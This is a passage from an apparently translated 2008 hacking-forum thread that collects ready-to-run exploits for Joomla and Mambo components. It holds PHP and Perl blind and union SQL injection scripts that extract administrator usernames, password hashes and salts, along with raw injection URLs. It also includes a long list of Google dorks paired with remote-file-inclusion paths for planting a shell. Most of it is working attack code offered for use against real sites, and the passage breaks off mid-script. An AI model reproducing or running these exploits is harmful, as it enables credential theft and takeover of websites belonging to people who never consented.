  $res_p = post_data($h_host_h_xdsjaop,$a_->{'sending_options'}{'path'}."?".$query_g,"application/x-www-form-urlencoded",$query_p);
  foreach $a (@{$a_->{'sending_options'}{'attack'}{'regex'}})
    {
    if ($res_p =~m/$a_->{'sending_options'}{'attack'}{'regex'}[$h][0]/)
    {
    return 1;
    }
    else
    {
      return 0;
    }
    $h++;
  }
  }
 }
    sub modify($$$)
 {
    $string = shift;
    $replace_by = shift;
    $replace_by1 = shift;
    if ($string !~/\$i/ && $string !~/\$h/) {
      print $string;
        } elsif ($string !~/\$i/)
  {
          $ff = substr($string,0,index($string,"\$h"));
            $ee =  substr($string,rindex($string,"\$h")+2);
            $string = $ff.$replace_by1.$ee;
            return $string;
  } elsif ($string !~/\$h/)
  {
        $f = substr($string,0,index($string,"\$i"));
        $e = substr($string,rindex($string,"\$i")+2);
        $string = $f.$replace_by.$e;
      return $string;
  } else
  {
      $f = substr($string,0,index($string,"\$i"));
        $e = substr($string,rindex($string,"\$i")+2);
        $string = $f.$replace_by.$e;
      $ff = substr($string,0,index($string,"\$h"));
        $ee =  substr($string,rindex($string,"\$h")+2);
        $string = $ff.$replace_by1.$ee;
      return $string;
  }
 }
 sub get_d_p_s
 {
  $g_d_p_s = shift;
  $post_data = "";
  $get_data = "";
  $header_data = "";
  %header_dA = ();
  while (($k,$v) = each(%{$a_->{'sending_options'}{'attack'}}))
  {
  if ($a_->{'sending_options'}{'attack'}{$k}[0] =~ "get")
    {
    $method = "get"; push(@get,$a_->{'sending_options'}{'attack'}{$k}[1]."=".$a_->{'sending_options'}{'attack'}{$k}[2]);
    }
    elsif ($a_->{'sending_options'}{'attack'}{$k}[0] =~ "post")
    {
    $method = "post"; push(@post,$a_->{'sending_options'}{'attack'}{$k}[1]."=".$a_->{'sending_options'}{'attack'}{$k}[2]);
    }
    elsif ($a_->{'sending_options'}{'attack'}{$k}[0] =~ "header")
    {
            $header_dA{$a_->{'sending_options'}{'attack'}{$k}[1]} = $a_->{'sending_options'}{'attack'}{$k}[2];
    }
    $hp++;
  }
  $yy = $#get;
  while ($bb <= $#get)
  {
  $get_data .= $get[$yy]."&";
  $bb++;
  $yy--;
  }
  $l = $#post;
  while ($k <= $#post)
  {
 
  $post_data .= $post[$l]."&";
  $k++;
  $l--;
  }
  if ($g_d_p_s eq "get")
  {
 
  return $get_data;
  }
  elsif ($g_d_p_s eq "post")
  {
  return $post_data;
  } elsif ($g_d_p_s eq "header")
  {
  return %header_dA;
  }
 }
 sub get_data
 {
  $h_host_h_xdsjaop = shift;
  $h_path_h_xdsjaop = shift;
  %hash = get_d_p_s("header");
    while (($u,$c) = each(%hash))
  {
  $ua->default_headers->push_header($u => $c);
  }
  $req = $ua->get($h_host_h_xdsjaop.$h_path_h_xdsjaop);
  return $req->content;
 }
 sub post_data
 {
  $h_host_h_xdsjaop = shift;
  $h_path_h_xdsjaop = shift;
  $content_type = shift;
  $send = shift;
  %hash = get_d_p_s("header");
    while (($u,$c) = each(%hash))
  {
      $ua->default_headers->push_header($u => $c);
  }
  $req = HTTP::Request->new(POST => $h_host_h_xdsjaop.$h_path_h_xdsjaop);
  $req->content_type($content_type);
  $req->content($send);
  $res = $ua->request($req);
  return $res->content;
 }
}

# milw0rm.com [2008-05-01]

milw0rm

~!DoK_tOR!~ 11.05.2008 18:41

Joomla Component com_datsogallery 1.6 Blind SQL Injection Exploit

Code:

<?php
//Joomla Component com_datsogallery 1.6 Blind SQL Injection Exploit by +toxa+
//Greets: all members of antichat.ru & cih.ms

//options
set_time_limit(0);
ignore_user_abort(1);
$norm_ua='Mozilla/5.0 (Windows; U; Windows NT 6.0; ru; rv:1.8.1.14) Gecko/20080404 Firefox/2.0.0.14';
$url=$_GET['url'];
$where=(!empty($_GET['user']))?"where username='".$_GET['user']."'":'limit 0,1';
$id=(!empty($_GET['id']))?$_GET['id']:'1';
$pass='';

//functions
// sub_votepic.php inserts (picture id, client IP + User-Agent) into #__datsogallery_votes,
// so the payload travels in the User-Agent header
function send_xpl($url, $xpl){
        global $id;
        $u=parse_url($url);
        $req ="GET ".$u['path']."components/com_datsogallery/sub_votepic.php?id=$id&user_rating=1 HTTP/1.1\r\n";
        $req.="Host: ".$u['host']."\r\n";
        $req.="User-Agent: ".$xpl."\r\n";
        $req.="Connection: Close\r\n\r\n";
        $fs=fsockopen($u['host'], 80, $errno, $errstr, 30) or die("error: $errno - $errstr<br>\n");
        fwrite($fs, $req);
        $res=fread($fs, 4096);
        fclose($fs);
        return $res;
}

// Closes the VALUES row with a random (hence unique) value and adds a second row whose
// vip is the normal User-Agent when the condition holds ("Duplicate entry", because that
// vote was already stored by the first request) and a multi-row subquery otherwise
// ("Subquery returns more than 1 row"). Either way the page errors and nothing is stored.
// #__ is Joomla's table-prefix placeholder, replaced with the real prefix before execution.
function xpl($condition, $pos){
        global $norm_ua;
        global $where;
        $xpl=rand(1,100000)."'),(1,if(ascii(substring((select password from #__users $where),$pos,1))$condition,(select '$norm_ua'),(select link from #__menu)))/*";
        return $xpl;
}

//main
echo '<title>Joomla Component com_datsogallery 1.6 Blind SQL Injection Exploit by +toxa+</title>';
if(empty($url)) die($_SERVER['SCRIPT_NAME']."?url=[url]&user=[username]&id=[pic_id]\n<br>username&pic_id - optional\n");
send_xpl($url, $norm_ua);   // store the normal vote that the duplicate test collides with

//get md5 (position 0 gives an empty substring and is simply a wasted request)
for($i=0;$i<=32;$i++){
        $buff=send_xpl($url,xpl('>58', $i));
        if(preg_match('/Duplicate entry/', $buff)){                       // a letter: 'a'..'f'
                for($j=97;$j<=102;$j++){
                        if(preg_match('/Duplicate entry/', send_xpl($url, xpl('='.$j,$i)))){ $pass.=chr($j); break; }
                }
        } elseif(preg_match('/Subquery returns more than 1 row/', $buff)){ // a digit: '0'..'9'
                for($j=48;$j<=57;$j++){
                        if(preg_match('/Duplicate entry/', send_xpl($url, xpl('='.$j,$i)))){ $pass.=chr($j); break; }
                }
        } else {
                die("exploit failed");
        }
}

//check Joomla version: a bare 32-character md5 means 1.0.x; 1.5 stores md5(password.salt):salt
$test=rand(1,100000)."'),(1,if((select length(password) from #__users $where)=32,(select '$norm_ua'),(select link from #__menu)))/*";
$buff=send_xpl($url,$test);
if(preg_match('/Duplicate entry/', $buff)) die($pass);

//separator
$pass.=':';

//get salt (positions 34..49; position 33 is the ':' and matches nothing)
for($i=33;$i<=49;$i++){
        $buff=send_xpl($url,xpl('>58', $i));
        if(preg_match('/Duplicate entry/', $buff)){
                $buff=send_xpl($url, xpl('>91',$i));
                if(preg_match('/Duplicate entry/', $buff)){               // lower-case letter
                        for($j=97;$j<=122;$j++){
                                if(preg_match('/Duplicate entry/', send_xpl($url, xpl('='.$j,$i)))){ $pass.=chr($j); break; }
                        }
                } elseif(preg_match('/Subquery returns more than 1 row/', $buff)){ // upper-case letter
                        for($j=65;$j<=90;$j++){
                                if(preg_match('/Duplicate entry/', send_xpl($url, xpl('='.$j,$i)))){ $pass.=chr($j); break; }
                        }
                } else {
                        die("exploit failed");
                }
        } elseif(preg_match('/Subquery returns more than 1 row/', $buff)){ // digit
                        for($j=48;$j<=57;$j++){
                                if(preg_match('/Duplicate entry/', send_xpl($url, xpl('='.$j,$i)))){ $pass.=chr($j); break; }
                        }
        } else {
                die("exploit failed");
        }
}
echo $pass;


Author : +toxa+

Amoura 13.05.2008 01:00

Joomla Component xsstream-dm 0.01 Beta SQL Injection


Code:

#!/usr/bin/perl -w

#########################################################
# Joomla Component xsstream-dm 0.01 Beta Remote SQL Injection #
# download : http://sstreamtv.com/index.php?option=com_docman&task=doc_details&gid=24
#########################################################

########################################
#[*] Founded by : Houssamix From H-T Team
#[*] H-T Team [ HouSSaMix + ToXiC350 ] from MoroCCo
#[*] Dork inurl:"index.php?option=com_xsstream-dm"
#[*] Greetz : CoNaN & HaCkeR_EgY & All friends & All muslims HaCkeRs :)

########################################
#[*] Script_Name: "Joomla"
#[*] Component_Name: "xsstream-dm" 0.01 Beta
########################################

print "\t\t########################################################\n\n";
print "\t\t# Viva Islam #\n\n";
print "\t\t########################################################\n\n";
print "\t\t# Joomla Component (xsstream-dm) Remote SQL Injection #\n\n";
print "\t\t# by Houssamix & Stack-Terrorist #\n\n";
print "\t\t# from H-T Team & v4 Team #\n\n";
print "\t\t########################################################\n\n";

use LWP::UserAgent;
die "Example: perl $0 http://victim.com/\n" unless @ARGV;
#the username of joomla
$user="username";
#the pasword of joomla
$pass="password";
#the tables of joomla
$tab="jos_users";
#the the union of joomla
$un="/**/union/**/select/**/";
#the vulnerable compenent
$com="com_xsstream-dm&Itemid";
# Lets star exploiting
$b = LWP::UserAgent->new() or die "Could not initialize browser\n";
$b->agent('Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1)');

$host = $ARGV[0] . "/index.php?option=".$com."=69&movie=-1".$un."1,2,".$user.",4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22/**/from/**/".$tab."/**";

$res = $b->request(HTTP::Request->new(GET=>$host));
$answer = $res->content;

if ($answer =~ /<div class="contentpagetitle">(.*?)<\/div>/){
       
        print "\n[+] Admin User : $1";
}
$host2 = $ARGV[0] . "/index.php?option=".$com."=69&movie=-1".$un."1,2,".$pass.",4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22/**/from/**/".$tab."/**";

$res2 = $b->request(HTTP::Request->new(GET=>$host2));
$answer = $res2->content;

if ($answer =~/([0-9a-fA-F]{32})/){print "\n[+] Admin Hash : $1\n\n";
print "\t\t# Exploit has ben aported user and password hash #\n\n";
}

else{print "\n[-] Exploit Failed...\n";}

# exploit discovered by Houssamix From H-T Team
# exploit exploited by Stack-Terrorist

(c) by Houssamix & Stack-Terrorist

baltazar 19.05.2008 19:05

Joomla Component com_galeria Remote SQL Injection Vulnerability
Code:

###############################################################
#
# joomla SQL Injection(com_galeria)
#
###############################################################
#
# AUTHOR : S@BUN
#
# HOME : http://www.milw0rm.com/author/1334
#
# MAIL : hackturkiye.hackturkiye@gmail.com
#
################################################################
#
# DORK 1 : allinurl: "com_galeria"
#
# DORK 2 : allinurl: id "com_galeria"
#
################################################################
EXPLOIT :

index.php?option=com_galeria&Itemid=S@BUN&func=detail&id=-999999/**/union/**/select/**/0,0,password,111,222,333,0,0,0,0,0,1,1,1,1,1,1,444,555,666,username/**/from/**/users/*

################################################################
# S@BUN                  i AM NOT HACKER                S@BUN
################################################################


vp$ 21.05.2008 10:49

Table prefix disclosure in the datsogallery component
If, when requesting the page
Quote:

http://www.domain.ru/path/components/com_datsogallery/sub_votepic.php?id=1&user_rating=1
a number is returned, then on a repeated request the page spits out an error
Quote:

DB function failed with error number 1062
Duplicate entry '1-83.142.***.***83.142.***.***Opera/9.27 (Windows NT 5.1; U; ru)' for key 1 SQL=INSERT INTO jos_datsogallery_votes ( vpic, vip ) VALUES ( 1, '83.142.***.***83.142.***.***Opera/9.27 (Windows NT 5.1; U; ru)' )
doesn't work on all versions
example _http://www.sociotypes.ru/components/com_datsogallery/sub_votepic.php?id=1&user_rating=1

+toxa+ 21.05.2008 17:48

Quote:

Originally posted by vp$
Table prefix disclosure in the datsogallery component
If, when requesting the page

a number is returned, then on a repeated request the page spits out an error

doesn't work on all versions
example _http://www.sociotypes.ru/components/com_datsogallery/sub_votepic.php?id=1&user_rating=1

Um... that's exactly what my exploit is based on =\ Only the prefix doesn't matter in my case, because #__ is replaced with the current prefix when Joomla's corresponding function processes it

baltazar 23.05.2008 20:21

Mambo Component garyscookbook <= 1.1.1 SQL Injection Vulnerability
Code:

###############################################################
#
# joomla com_garyscookbook SQL Injection(id)
#
###############################################################
#
# AUTHOR : S@BUN
#
# HOME : http://www.milw0rm.com/author/1334
#
# MAİL : hackturkiye.hackturkiye@gmail.com
#
################################################################
#
#    there are alot site but exploit not working for all ı found alot
#
# DORK 1 : allinurl:"com_garyscookbook"
#
# DORK 2 : allinurl: com_garyscookbook "detail"
#
################################################################
EXPLOIT :

index.php?option=com_garyscookbook&Itemid=S@BUN&func=detail&id=-666/**/union+select/**/0,0,password,0,0,0,0,0,0,0,0,0,0,0,1,1,1,0,0,0,0,0,username+from%2F%2A%2A%2Fmos_users/*


################################################################
# S@BUN            i AM NOT HACKER              S@BUN
################################################################

  <name>garyscookbook</name>
  <creationDate>4-9-2005</creationDate>
  <author>Gerald Berger</author>
  <copyright>This component is released under the GNU/GPL License</copyright>
  <authorEmail>gerald@vb-dozent.net</authorEmail>

  <authorUrl>www.vb-dozent.net</authorUrl>
  <version>1.1.1</version>
  <description>Garys Cookbook is a fully integrated Mambo Cookbook component.</description>


it's my 29.05.2008 09:15

found this on my computer, no idea, might be a repost
Code:

inurl:"com_flyspray"

Append to site URL:
/components/com_flyspray/startdown.php?file=shell


Google Dork:
inurl:"com_admin"

Append to site URL:
administrator/components/com_admin/admin.admin.html.php?mosConfig_absolute_path=shell


Google Dork:
inurl:index.php?option=com_simpleboard

Append to site URL:
/components/com_simpleboard/file_upload.php?sbp=shell


Google Dork:
inurl:"com_hashcash"

Append to site URL:
/components/com_hashcash/server.php?mosConfig_absolute_path=shell


Google Dork:
inurl:"com_htmlarea3_xtd-c"

Code:
/components/com_htmlarea3_xtd-c/popups/ImageManager/config.inc.php?mosConfig_absolute_path=shell


Google Dork:
inurl:"com_sitemap"

Code:
/components/com_sitemap/sitemap.xml.php?mosConfig_absolute_path=shell


Google Dork:
inurl:"com_performs"

Append to site URL:
components/com_performs/performs.php?mosConfig_absolute_path=shell


Google Dork:
inurl:"com_forum"

Append to site URL:
/components/com_forum/download.php?phpbb_root_path=


Google Dork:
inurl:"com_pccookbook"

Append to site URL:
components/com_pccookbook/pccookbook.php?mosConfig_absolute_path=shell


Google Dork:
inurl:index.php?option=com_extcalendar

Append to site URL:
/components/com_extcalendar/extcalendar.php?mosConfig_absolute_path=shell


Google Dork:
inurl:"minibb"

Append to site URL:
components/minibb/index.php?absolute_path=shell


Google Dork:
inurl:"com_smf"

Append to site URL:
/components/com_smf/smf.php?mosConfig_absolute_path=
Append to site URL 2:
/modules/mod_calendar.php?absolute_path=shell


Google Dork:
inurl:"com_pollxt"

Append to site URL:
/components/com_pollxt/conf.pollxt.php?mosConfig_absolute_path=shell


Google Dork:
inurl:"com_loudmounth"

Append to site URL:
/components/com_loudmounth/includes/abbc/abbc.class.php?mosConfig_absolute_path=shell


Google Dork:
inurl:"com_videodb"

Append to site URL:
/components/com_videodb/core/videodb.class.xml.php?mosConfig_absolute_path=shell


Google Dork:
inurl:index.php?option=com_pcchess

Append to site URL:
/components/com_pcchess/include.pcchess.php?mosConfig_absolute_path=shell


Google Dork:
inurl:"com_multibanners"

Append to site URL:
/administrator/components/com_multibanners/extadminmenus.class.php?mosConfig_absolute_path=shell


Google Dork:
inurl:"com_a6mambohelpdesk"

Append to site URL:
/administrator/components/com_a6mambohelpdesk/admin.a6mambohelpdesk.php?mosConfig_live_site=shell


Google Dork:
inurl:"com_colophon"

Append to site URL:
/administrator/components/com_colophon/admin.colophon.php?mosConfig_absolute_path=shell


Google Dork:
inurl:"com_mgm"

Append to site URL:
administrator/components/com_mgm/help.mgm.php?mosConfig_absolute_path=shell


Google Dork:
inurl:"com_mambatstaff"

Append to site URL:
/components/com_mambatstaff/mambatstaff.php?mosConfig_absolute_path=shell


Google Dork:
inurl:"com_securityimages"

Append to site URL:
/components/com_securityimages/configinsert.php?mosConfig_absolute_path=shell
Append to site URL 2:
/components/com_securityimages/lang.php?mosConfig_absolute_path=shell


Google Dork:
inurl:"com_artlinks"

Append to site URL:
/components/com_artlinks/artlinks.dispnew.php?mosConfig_absolute_path=shell


Google Dork:
inurl:"com_galleria"

Append to site URL:
/components/com_galleria/galleria.html.php?mosConfig_absolute_path=shell


Google Dork:
inurl:"com_akocomment"

Append to site URL:
/akocomments.php?mosConfig_absolute_path=shell


Google Dork:
inurl:"com_cropimage"

Append to site URL:
administrator/components/com_cropimage/admin.cropcanvas.php?cropimagedir=shell


Google Dork:
inurl:"com_kochsuite"

Append to site URL:
/administrator/components/com_kochsuite/config.kochsuite.php?mosConfig_absolute_path=shell


Google Dork:
inurl:"com_comprofiler"

Append to site URL:
administrator/components/com_comprofiler/plugin.class.php?mosConfig_absolute_path=shell


Google Dork:
inurl:"com_zoom"

Append to site URL:
/components/com_zoom/classes/fs_unix.php?mosConfig_absolute_path=shell
Append to site URL 2:
/components/com_zoom/includes/database.php?mosConfig_absolute_path=shell


Google Dork:
inurl:"com_serverstat"

Append to site URL:
/administrator/components/com_serverstat/install.serverstat.php?mosConfig_absolute_path=shell


Google Dork:
inurl:"com_fm"

Append to site URL:
components/com_fm/fm.install.php?lm_absolute_path=shell


Google Dork:
inurl:com_mambelfish

Append to site URL:
administrator/components/com_mambelfish/mambelfish.class.php?mosConfig_absolute_path=shell


Google Dork:
inurl:com_lmo

Append to site URL:
components/com_lmo/lmo.php?mosConfig_absolute_path=shell


Google Dork:
inurl:com_linkdirectory

Append to site URL:
administrator/components/com_linkdirectory/toolbar.linkdirectory.html.php?mosConfig_absolute_path=shell


Google Dork:
inurl:com_mtree

Append to site URL:
components/com_mtree/Savant2/Savant2_Plugin_textarea.php?mosConfig_absolute_path=shell


Google Dork:
inurl:com_jim

Append to site URL:
administrator/components/com_jim/install.jim.php?mosConfig_absolute_path=shell


Google Dork:
inurl:com_webring

Append to site URL:
administrator/components/com_webring/admin.webring.docs.php?component_dir=shell


Google Dork:
inurl:com_remository

Append to site URL:
administrator/components/com_remository/admin.remository.php?mosConfig_absolute_path=


Google Dork:
inurl:com_babackup

Append to site URL:
administrator/components/com_babackup/classes/Tar.php?mosConfig_absolute_path=shell


Google Dork:
inurl:com_lurm_constructor

Append to site URL:
administrator/components/com_lurm_constructor/admin.lurm_constructor.php?lm_absolute_path=shell


Google Dork:
inurl:com_mambowiki

Append to site URL:
components/com_mambowiki/MamboLogin.php?IP=shell


Google Dork:
inurl:com_a6mambocredits

Append to site URL:
administrator/components/com_a6mambocredits/admin.a6mambocredits.php?mosConfig_live_site=shell


Google Dork:
inurl:com_phpshop

Append to site URL:
administrator/components/com_phpshop/toolbar.phpshop.html.php?mosConfig_absolute_path=shell


Google Dork:
inurl:com_cpg

Append to site URL:
components/com_cpg/cpg.php?mosConfig_absolute_path=shell


Google Dork:
inurl:com_moodle

Append to site URL:
components/com_moodle/moodle.php?mosConfig_absolute_path=shell


Google Dork:
inurl:com_extended_registration

Append to site URL:
components/com_extended_registration/registration_detailed.inc.php?mosConfig_absolute_path=shell

Code:

Google Dork:
inurl:com_mospray

Append to site URL:
components/com_mospray/scripts/admin.php?basedir=shell


Google Dork:
inurl:com_bayesiannaivefilter

Append to site URL:
/administrator/components/com_bayesiannaivefilter/lang.php?mosConfig_absolute_path=shell


Google Dork:
inurl:com_uhp

Append to site URL:
/administrator/components/com_uhp/uhp_config.php?mosConfig_absolute_path=shell


Google Dork:
inurl:com_peoplebook

Append to site URL:
/administrator/components/com_peoplebook/param.peoplebook.php?mosConfig_absolute_path=shell


Google Dork:
inurl:com_mmp

Append to site URL:
/administrator/components/com_mmp/help.mmp.php?mosConfig_absolute_path=shell


Google Dork:
inurl:com_reporter

Append to site URL:
/components/com_reporter/processor/reporter.sql.php?mosConfig_absolute_path=shell


Google Dork:
inurl:com_madeira

Append to site URL:
/components/com_madeira/img.php?url=shell


Google Dork:
inurl:com_jd-wiki

Append to site URL:
/components/com_jd-wiki/lib/tpl/default/main.php?mosConfig_absolute_path=shell


Google Dork:
inurl:com_bsq_sitestats

Append to site URL:
/components/com_bsq_sitestats/external/rssfeed.php?baseDir=shell
Append to site URL 2:
/com_bsq_sitestats/external/rssfeed.php?baseDir=shell
Dork:

com_comprofiler

Expl:
administrator/components/com_comprofiler/plugin.class.
php?mosConfig_absolute_path=[Shell]



Dork:
inurl:com_multibanners

Expl:
/administrator/components/com_multibanners/extadminmenus.class.
php?mosConfig_absolute_path=[Shell]

Dork:
inurl:com_colophon

expl:
administrator/components/com_colophon/admin.colophon.
php?mosConfig_absolute_path=[Shell]


Dork:

inurl:index.php?option=[Shell]com_simpleboard

Expl:
/components/com_simpleboard/file_upload.php?sbp=[Shell]

Dork:

inurl:"com_hashcash"


Expl:
/components/com_hashcash/server.php?mosConfig_absolute_path=[Shell]
-
Dork:
inurl:"com_htmlarea3_xtd-c"

Expl:
/components/com_htmlarea3_xtd-c/popups/ImageManager/config.inc.
php?mosConfig_absolute_path=[Shell]
-
Dork:
inurl:"com_sitemap"

Expl:
/components/com_sitemap/sitemap.xml.php?mosConfig_absolute_path=[Shell]

--
Dork:
inurl:"com_forum"

Expl:
/components/com_forum/download.php?phpbb_root_path=[Shell]
--
Dork:
inurl:"com_pccookbook"

Expl:
/components/com_pccookbook/pccookbook.php?mosConfig_absolute_path=[Shell]

Dork:
inurl:index.php?option=[Shell]com_extcalendar

Expl:
/components/com_extcalendar/extcalendar.php?mosConfig_absolute_path=[Shell]

Dork:
inurl:"minibb"

Expl:
/components/minibb/index.php?absolute_path=[Shell]
-
Dork:
inurl:"com_smf"

Expl:
/components/com_smf/smf.php?mosConfig_absolute_path=[Shell]


Expl:
/modules/mod_calendar.php?absolute_path=[Shell]

Dork:
inurl:"com_pollxt"

Expl:
/components/com_pollxt/conf.pollxt.php?mosConfig_absolute_path=[Shell]

Dork:
inurl:"com_loudmounth"

Expl:
/components/com_loudmounth/includes/abbc/abbc.class.
php?mosConfig_absolute_path=[Shell]
-
Dork:
inurl:"com_videodb"

Expl:
/components/com_videodb/core/videodb.class.xml.
php?mosConfig_absolute_path=[Shell]

Dork:
inurl:index.php?option=[Shell]com_pcchess

Expl:
/components/com_pcchess/include.pcchess.php?mosConfig_absolute_path=[Shell]

Dork:
inurl:"com_multibanners"

Expl:
/administrator/components/com_multibanners/extadminmenus.class.
php?mosConfig_absolute_path=[Shell]


Dork:
inurl:"com_a6mambohelpdesk"

Expl:
/administrator/components/com_a6mambohelpdesk/admin.a6mambohelpdesk.
php?mosConfig_live_site=[Shell]

Dork:
inurl:"com_colophon"

Expl:
/administrator/components/com_colophon/admin.colophon.
php?mosConfig_absolute_path=[Shell]

Dork:
inurl:"com_mgm"

Expl:
/administrator/components/com_mgm/help.mgm.php?mosConfig_absolute_path=[Shell]

Dork:
inurl:"com_mambatstaff"

Expl:
/components/com_mambatstaff/mambatstaff.php?mosConfig_absolute_path=[Shell]

Dork:
inurl:"com_securityimages"

Expl:
/components/com_securityimages/configinsert.php?mosConfig_absolute_path=[Shell]

Expl:
/components/com_securityimages/lang.php?mosConfig_absolute_path=[Shell]


Dork:
inurl:"com_artlinks"

Expl:
/components/com_artlinks/artlinks.dispnew.php?mosConfig_absolute_path=[Shell]
-
Dork:
inurl:"com_galleria"

Expl:
/components/com_galleria/galleria.html.php?mosConfig_absolute_path=[Shell]


~!DoK_tOR!~ 02.06.2008 15:37

Joomla Component com_mycontent 1.1.13 Blind SQL Injection Exploit

Code:

#!/usr/bin/perl
use LWP::UserAgent;
use Getopt::Long;

if(!$ARGV[1])
{
  print "                                                                \n";
  print "  #############################################################\n";
  print "  #  Joomla Component mycontent Blind SQL Injection Exploit  #\n";
  print "  #  Author:His0k4 [ALGERIAN HaCkeR]                        #\n";
  print "  #                                                          #\n";
  print "  #  Conctact: His0k4.hlm[at]gamil.com                      #\n";
  print "  #  Greetz:  All friends & muslims HacKeRs                #\n";
  print "  #  Greetz2:  http://www.palcastle.org/cc :)                #\n";
  print "  #                                                          #\n";
  print "  #  Usage:  perl mycontent.pl host path <options>          #\n";
  print "  #  Example: perl mycontent.pl www.host.com /joomla/ -r 10  #\n";
  print "  #                                                          #\n";
  print "  #  Options:                                                #\n";
  print "  #    -r    Valid  id                                      #\n";
  print "  #  Note:                                                  #\n";
  print "  #  If the exploit failed                                  #\n";
  print "  #  Change 'regexp' value to the title of the page          #\n";
  print "  #############################################################\n";
  exit;
}

my $host    = $ARGV[0];
my $path    = $ARGV[1];
my $userid  = 1;
my $rid    = $ARGV[2];

my %options = ();
GetOptions(\%options, "u=i", "p=s", "r=i");

print "[~] Exploiting...\n";

if($options{"u"})
{
  $userid = $options{"u"};
}

if($options{"r"})
{
  $rid = $options{"r"};
}

syswrite(STDOUT, "[~] MD5-Hash: ", 14);

for(my $i = 1; $i <= 32; $i++)
{
  my $f = 0;
  my $h = 48;
  while(!$f && $h <= 57)
  {
    if(istrue2($host, $path, $userid, $rid, $i, $h))
    {
      $f = 1;
      syswrite(STDOUT, chr($h), 1);
    }
    $h++;
  }
  if(!$f)
  {
    $h = 97;
    while(!$f && $h <= 122)
    {
      if(istrue2($host, $path, $userid, $rid, $i, $h))
      {
        $f = 1;
        syswrite(STDOUT, chr($h), 1);
      }
      $h++;
    }
  }
}

print "\n[~] Exploiting done\n";

sub istrue2
{
  my $host  = shift;
  my $path  = shift;
  my $uid  = shift;
  my $rid  = shift;
  my $i    = shift;
  my $h    = shift;
 
  my $ua = LWP::UserAgent->new;
  my $query = "http://".$host.$path."index.php?option=com_mycontent&task=view&id=".$rid." and (SUBSTRING((SELECT password FROM jos_users LIMIT 0,1 ),".$i.",1))=CHAR(".$h.")";
 
  if($options{"p"})
  {
    $ua->proxy('http', "http://".$options{"p"});
  }
 
  my $resp = $ua->get($query);
  my $content = $resp->content;
  my $regexp = "E-mail";
 
  if($content =~ /$regexp/)
  {
    return 1;
  }
  else
  {
    return 0;
  }

}

# milw0rm.com [2008-06-01]


Joomla Component JooBB 0.5.9 Blind SQL Injection Exploit


Code:

#!/usr/bin/perl
use LWP::UserAgent;
use Getopt::Long;

if(!$ARGV[1])
{
  print "                                                                \n";
  print "  #############################################################\n";
  print "  #  Joomla Component Joo!BB Blind SQL Injection Exploit    #\n";
  print "  #  Author:His0k4 [ALGERIAN HaCkeR]                        #\n";
  print "  #                                                          #\n";
  print "  #  Conctact: His0k4.hlm[at]gamil.com                      #\n";
  print "  #  Greetz:  All friends & muslims HacKeRs                #\n";
  print "  #  Greetz2:  http://www.palcastle.org/cc :)                #\n";
  print "  #                                                          #\n";
  print "  #  Usage:  perl jobb.pl host path <options>              #\n";
  print "  #  Example: perl jobb.pl www.host.com /joomla/ -f 1        #\n";
  print "  #                                                          #\n";
  print "  #  Options:                                                #\n";
  print "  #    -f    Forum  id                                      #\n";
  print "  #  Note:                                                  #\n";
  print "  #  If you need to change the match value so do it :D      #\n";
  print "  #############################################################\n";
  exit;
}

my $host    = $ARGV[0];
my $path    = $ARGV[1];
my $userid  = 1;
my $fid    = $ARGV[2];

my %options = ();
GetOptions(\%options, "u=i", "p=s", "f=i");

print "[~] Exploiting...\n";

if($options{"u"})
{
  $userid = $options{"u"};
}

if($options{"f"})
{
  $fid = $options{"f"};
}

syswrite(STDOUT, "[~] MD5-Hash: ", 14);

for(my $i = 1; $i <= 32; $i++)
{
  my $f = 0;
  my $h = 48;
  while(!$f && $h <= 57)
  {
    if(istrue2($host, $path, $userid, $fid, $i, $h))
    {
      $f = 1;
      syswrite(STDOUT, chr($h), 1);
    }
    $h++;
  }
  if(!$f)
  {
    $h = 97;
    while(!$f && $h <= 122)
    {
      if(istrue2($host, $path, $userid, $fid, $i, $h))
      {
        $f = 1;
        syswrite(STDOUT, chr($h), 1);
      }
      $h++;
    }
  }
}

print "\n[~] Exploiting done\n";

sub istrue2
{
  my $host  = shift;
  my $path  = shift;
  my $uid  = shift;
  my $fid  = shift;
  my $i    = shift;
  my $h    = shift;
 
  my $ua = LWP::UserAgent->new;
  my $query = "http://".$host.$path."index.php?option=com_joobb&view=forum&forum=".$fid." and (SUBSTRING((SELECT password FROM jos_users LIMIT 0,1 ),".$i.",1))=CHAR(".$h.")";
 
  if($options{"p"})
  {
    $ua->proxy('http', "http://".$options{"p"});
  }
 
  my $resp = $ua->get($query);
  my $content = $resp->content;
  my $regexp = "Announcements";
 
  if($content =~ /$regexp/)
  {
    return 1;
  }
  else
  {
    return 0;
  }

}

# milw0rm.com [2008-06-01]


baltazar 03.06.2008 01:11

Joomla Component acctexp <= 0.12.x Blind SQL Injection Exploit
Code:

#!/usr/bin/perl
use LWP::UserAgent;
use Getopt::Long;

if(!$ARGV[1])
{
  print "                                                                \n";
  print "  #############################################################\n";
  print "  #  Joomla Component acctexp Blind SQL Injection Exploit    #\n";
  print "  #  Author:His0k4 [ALGERIAN HaCkeR]                        #\n";
  print "  #                                                          #\n";
  print "  #  Conctact: His0k4.hlm[at]gamil.com                      #\n";
  print "  #  Greetz:  All friends & muslims HacKeRs                #\n";
  print "  #  Greetz2:  http://www.palcastle.org/cc :)                #\n";
  print "  #                                                          #\n";
  print "  #  Usage:  perl acctexp.pl host path <options>            #\n";
  print "  #  Example: perl acctexp.pl www.host.com /joomla/ -g 1    #\n";
  print "  #                                                          #\n";
  print "  #  Options:                                                #\n";
  print "  #    -g    usage  id                                      #\n";
  print "  #  Note:                                                  #\n";
  print "  #  Don't forget to change the match if you have to do it :)#\n";
  print "  #############################################################\n";
  exit;
}

my $host    = $ARGV[0];
my $path    = $ARGV[1];
my $userid  = 1;
my $gid    = $ARGV[2];

my %options = ();
GetOptions(\%options, "u=i", "p=s", "g=i");

print "[~] Exploiting...\n";

if($options{"u"})
{
  $userid = $options{"u"};
}

if($options{"g"})
{
  $gid = $options{"g"};
}

syswrite(STDOUT, "[~] MD5-Hash: ", 14);

for(my $i = 1; $i <= 32; $i++)
{
  my $f = 0;
  my $h = 48;
  while(!$f && $h <= 57)
  {
    if(istrue2($host, $path, $userid, $gid, $i, $h))
    {
      $f = 1;
      syswrite(STDOUT, chr($h), 1);
    }
    $h++;
  }
  if(!$f)
  {
    $h = 97;
    while(!$f && $h <= 122)
    {
      if(istrue2($host, $path, $userid, $gid, $i, $h))
      {
        $f = 1;
